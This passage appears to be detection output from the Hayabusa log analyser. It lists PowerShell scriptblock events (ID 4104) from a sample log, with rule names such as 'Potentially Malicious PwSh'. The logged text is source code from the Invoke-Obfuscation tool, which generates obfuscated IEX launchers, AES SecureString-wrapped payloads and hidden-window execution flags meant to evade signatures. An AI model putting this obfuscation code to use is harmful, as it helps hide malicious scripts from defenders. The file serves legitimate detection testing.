$SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and rando",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"mizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.266 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"mizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-SecureStringCommand { <# .SYNOPSIS Generates AES-encrypted SecureString object out of three possible syntaxes for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-SecureStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-SecureStringCommand encrypts an input PowerShell scriptblock or path as a SecureString object. It randomly selects between three different syntaxes for accomplishing this. The purpose is to highlight to the Blue Team that there are more novel ways to encode/encrypt a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. 
.PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfi -NonIn "" IEX( ([Runtime.InteropServices.Marshal]::PtrToStringUni( [Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode( $('76492d1116743f0423413b16050a5345MgB8AG0AOQBKAEcAZgBHAEwAaQBBADkAbABoAFQASgBGAGEATgBBAFUAOABIAGcAPQA9AHwAYwBmADEAZgA4ADQAYgAyADkAZgBjADcAOABiAGYAYgBkADAAZAA5AGMAMgBlADgAZQBjADIAOAAxADYAOQBhADYANQBkADYANQA3ADEAMAAwADQAMwBjADgAMAA1AGMAZAAwADYAOQAxAGIAMQA5ADYAYwAwADQAMAA1AGEAOAA5ADEANwA1ADgANgA5ADEANABhAGQAMABhAGEANwAxAGUAZgBjADcAZABiADMAYgBlADgAYQBhAGIAMAAyADIANwA2AGYAYwBhAGQANwA0ADkAOAA2ADEAMAA0ADIAYQBkAGYAMAA5ADgAMwAzAGEAYwBmADYANQA5ADAANQA0ADcAYgAwADEANAAyADgAMwBmADUAMQAzADAAMQBmADAAZABkAGIAOQAxAGIAZQAxADIAZQA2ADIAMgAxADgAOAA5ADEANgA1AGEANgA2AGEAZABjADcAZQAwAGIANgBmADEANgA2ADAAMwBjADEANQAzAGUAZgBkADUAYQAwADYAMgBmAGMAOAAxAGUANgBmADgAYwA5ADUAZgBlADMANAA1ADQANQA3ADIANgA2ADYAOQBlAGUANwBkAGUAYQAyAGIAZAA2AGUAZgBiADUANwA4AGQANQA5ADIANgBjADMAZgBlADUANQA4AGMAOQBjADcANQA2ADEAYwA3ADQAYwAzAGUAZAA4ADkAOABlAGYANAA5AGUAZQAwADYAMgAxAGEAZgA2ADIAOABkAGYANwA4AGIAOAA1ADQANgA2ADIAYgBkAGQANAA4AGYANwA4AGYAYQBmAGIAZAAyAGMAYgBiADkANQBlADIAYwAyADYANABkADgAMgA2AGIAZQBlADIAZQBlAGUAOQA0AGIANgAxADIAZgA0ADIAOQBmADAAYwBmADIAOQBmAGYANgBlAGUAZAA3ADMAMAA0ADMAYwBjADQAMgBhAGIAZgA4ADAAMQA1ADYAOQA5AGYAZQA4AGIAMwBhAGMAOQAyADcAYwA2AGQAMgBmAGYANwA4AGQAOABiADAAZQBmADcANgBlAGIAMwBiADgAMwAxADcAZQBlAGQAYQBmAGYAYgBmAGIAYQA5AGEAYQBhAGQAOAA5AGQAZgAwAGMAMgAwAGUANQBlADcAOQA5ADAAZgBkADkAZAAwADMAYQBhADIAZAA0ADcAOQBkADAANgA1ADUAOAA=' |ConvertTo-SecureString -Key 241,131,91,52,14,165,71,51,19,86,1,104,87,220,235,62) ))) )"" C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru (New-Object Management.Automation.PSCredential ' ', ( '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' |ConvertTo-SecureString -Key 205,39,9,9,104,139,104,94,252,20,93,132,29,171,56,2 )).GetNetworkCredential().Password | Invoke-Expression .NOTES The size limit for a single SecureString object input is 65,536 characters. However, this will consume significant resources on the target system when decoding a SecureString object of this size (50% CPU and ~30 seconds on several test VMs). For larger payloads I would recommend chunking your payload and encoding/encrypting each piece separately and then reassembling each decoded/decrypted piece during runtime. I have a POC that does this and will be releasing a STAGING set of functions soon to accomplish this very task. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to a SecureString object. 
$SecureString = ConvertTo-SecureString $ScriptString -AsPlainText -Force # Randomly select the key length. Supported key lengths for SecureString (AES) are 16, 24 and 32. $KeyLength = Get-Random @(16,24,32) # Randomly select the key value and how it will be formatted. Switch(Get-Random -Minimum 1 -Maximum 3) { 1 { # Generate random key of length $KeyLength. $SecureStringKey = @() For($i=0; $i -lt $KeyLength; $i++) { $SecureStringKey += Get-Random -Minimum 0 -Maximum 256 } $SecureStringKeyStr = $SecureStringKey -Join ',' } 2 { # Generate sequential key of length $KeyLength with random array bounds. # To save space use shorthand array notation in final command with $SecureStringKeyStr. $LowerBound = (Get-Random -Minimum 0 -Maximum (256-$KeyLength)) $UpperBound = $LowerBound + ($KeyLength - 1) Switch(Get-Random @('Ascending','Descending')) { 'Ascending' {$SecureStringKey = ($LowerBound..$UpperBound); $SecureStringKeyStr = ""($LowerBound..$UpperBound)""} 'Descending' {$SecureStringKey = ($UpperBound..$LowerBound); $SecureStringKeyStr = ""($UpperBound..$LowerBound)""} default {Write-Error ""An invalid array ordering option was generated for switch block.""; Exit;} } } default {Write-Error ""An invalid random number was generated for switch block.""; Exit;} } # Convert SecureString object to text that we can load on target system. $SecureStringText = $SecureString | ConvertFrom-SecureString -Key $SecureStringKey # Generate random syntax for -Key command argument. $Key = (Get-Random -Input @(' -Key ',' -Ke ',' -K ')) # Randomly choose member invocation syntax. 
"".Invoke"" syntax below is not necessary for PS 3.0+ $PtrToStringAuto = (Get-Random -Input @('PtrToStringAuto',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(3,5)) + '].Name).Invoke'))) $PtrToStringUni = (Get-Random -Input @('PtrToStringUni' ,('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(2,4)) + '].Name).Invoke'))) $PtrToStringAnsi = (Get-Random -Input @('PtrToStringAnsi',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(0,1)) + '].Name).Invoke'))) # Below four notations are commented out as they only work on PS 3.0+ #$PtrToStringBSTR = (Get-Random -Input @('PtrToStringBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[142].Name).Invoke')) #$SecureStringToBSTR = (Get-Random -Input @('SecureStringToBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[162].Name)')) #$SecureStringToGlobalAllocUnicode = (Get-Random -Input @('SecureStringToGlobalAllocUnicode','([Runtime.InteropServices.Marshal].GetMembers()[169].Name)')) #$SecureStringToGlobalAllocAnsi = (Get-Random -Input @('SecureStringToGlobalAllocAnsi' ,'([Runtime.InteropServices.Marshal].GetMembers()[168].Name)')) # Randomize the case versions for necessary operations. 
$PtrToStringAuto = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAuto("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringUni = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringUni("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringAnsi = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAnsi("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::PtrToStringBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocUnicode = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocAnsi = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocAnsi(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $NewObject = ([Char[]]'New-Object ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PSCredential = ([Char[]]'Management.Automation.PSCredential ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ConvertToSecureString = ([Char[]]'ConvertTo-SecureString' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input 
@(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Key = ([Char[]]$Key | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $GetNetworkCredential = ([Char[]]').GetNetworkCredential().Password' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Set syntax for running ConvertTo-SecureString cmdlet. $ConvertToSecureStringSyntax = '$(' + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate the code that will decrypt and execute the payload and randomly select one. $NewScriptArray = @() $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAuto + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringUni + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocUnicode + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAnsi + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocAnsi + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringBSTR + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $NewObject + ' '*(Get-Random 